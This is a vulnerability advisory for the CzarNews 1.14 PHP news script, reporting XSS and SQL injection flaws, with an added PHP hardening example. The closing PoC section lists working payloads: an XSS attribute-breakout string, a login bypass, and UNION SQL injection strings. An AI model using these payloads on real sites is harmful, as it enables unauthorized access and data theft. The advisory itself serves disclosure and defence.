XSS and Multiple SQL Injection in CzarNews

Summary

Vulnerability
XSS and Multiple SQL Injection in CzarNews
Discovered
2006.04.04
Last Update
2006.04.14 Exploitation code published
ID
EV0118
CVE
CVE-2006-1640 CVE-2006-1641
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. Vendor notified.
Vendor
n/a
Vulnerable Software
CzarNews (http://www.czaries.net/scripts/)
Version
1.14
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the CzarNews (http://www.czaries.net/scripts/) script.

1. Cross-Site Scripting.

Vulnerable Script: news.php

The email parameter is not properly sanitized. This can be used to post arbitrary HTML or web script code.

Condition: magic_quotes_gpc = off

2. Multiple SQL Injections.

Vulnerable scripts:

cn_auth.php
news.php

Parameters usern (cn_auth.php), passw (cn_auth.php), s (news.php) and a (dpost.php) are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or execute arbitrary SQL queries by injecting SQL code.

Condition: magic_quotes_gpc = off
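The following hardening example is added here and is not part of the advisory or of CzarNews itself. It shows, in PHP, how both defects described above are closed: the email value is escaped for the HTML attribute context it is printed into (the XSS case), and the usern, passw, s and a values are bound as prepared-statement parameters instead of being concatenated into SQL (the injection case). The function names, the table and column names, and the in-memory SQLite database used so the file runs on its own are assumptions made for this example; the script's real database layer is not shown.

```php
<?php
// Added hardening example (hypothetical, not CzarNews code).
// Function, table and column names are assumptions for this example.
declare(strict_types=1);

// 1. XSS: the email value is printed inside value="...". Escaping with
// ENT_QUOTES turns both ' and " into entities, so the input can no longer
// close the attribute early and start a new tag.
function render_email_field(string $email): string
{
    $safe = htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="email" value="' . $safe . '">';
}

// Unsafe form, for comparison: the raw value lands in the attribute,
// which is the defect the advisory describes for news.php.
function render_email_field_unsafe(string $email): string
{
    return '<input type="text" name="email" value="' . $email . '">';
}

// 2a. Authentication: usern is bound, so an apostrophe in it is data,
// not SQL syntax. passw never reaches the query at all; it is checked
// against a stored hash in PHP.
function authenticate(PDO $db, string $usern, string $passw): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $usern]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($passw, $row['password_hash']);
}

// 2b. Search (s): the LIKE pattern is assembled in PHP and bound as a
// single parameter. % and _ in the input are escaped so a user cannot
// widen the match, and a bound value cannot append UNION clauses.
function search_news(PDO $db, string $s): array
{
    $pattern = '%' . addcslashes($s, '%_\\') . '%';
    $stmt = $db->prepare("SELECT id, title FROM news WHERE title LIKE :p ESCAPE '\\'");
    $stmt->execute([':p' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 2c. Numeric id (a): validate the shape first, then bind as an integer.
function get_post(PDO $db, string $a): ?array
{
    if (!ctype_digit($a)) {
        return null; // anything but digits is rejected before any query
    }
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', (int) $a, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demonstration on constructed sample data in an in-memory
// SQLite database (an assumption; only the PDO calls matter here).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password_hash TEXT)');
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$ins = $db->prepare('INSERT INTO users VALUES (:u, :h)');
$ins->execute([':u' => 'admin', ':h' => password_hash('example-pass', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO news (title, body) VALUES ('Release notes', 'text')");

// The advisory's PoC values are now ordinary strings: the login fails,
// the search matches nothing, the id is rejected, the email is escaped.
var_dump(authenticate($db, "' or 1/*", 'any'));
var_dump(count(search_news($db, "zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*")));
var_dump(get_post($db, "999' union select 1,2,3,4,5,6,7,8,9,10/*"));
echo render_email_field('">[XSS]<aaa aaa="'), "\n";
```

The advisory's condition magic_quotes_gpc = off means the issues were hidden when PHP itself backslash-escaped incoming quotes. That setting was deprecated in PHP 5.3 and removed in PHP 5.4, so it is not a fix: binding every value as a parameter and escaping output for its context, as above, is what actually closes both issues regardless of the PHP configuration.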

PoC/Exploit

1. Cross-Site Scripting Example:

URL: http://[host]/news.php?a=1

Post a Comment

Email: ">[XSS]<aaa aaa="

2. SQL Injection Examples:

URL: http://[host]/index.php

Username: ' or 1/*

Password: any

URL: http://[host]/news.php

News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*

URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*

Solution

A solution for "XSS and Multiple SQL Injection in CzarNews" is not available. Check the vendor's website for updates.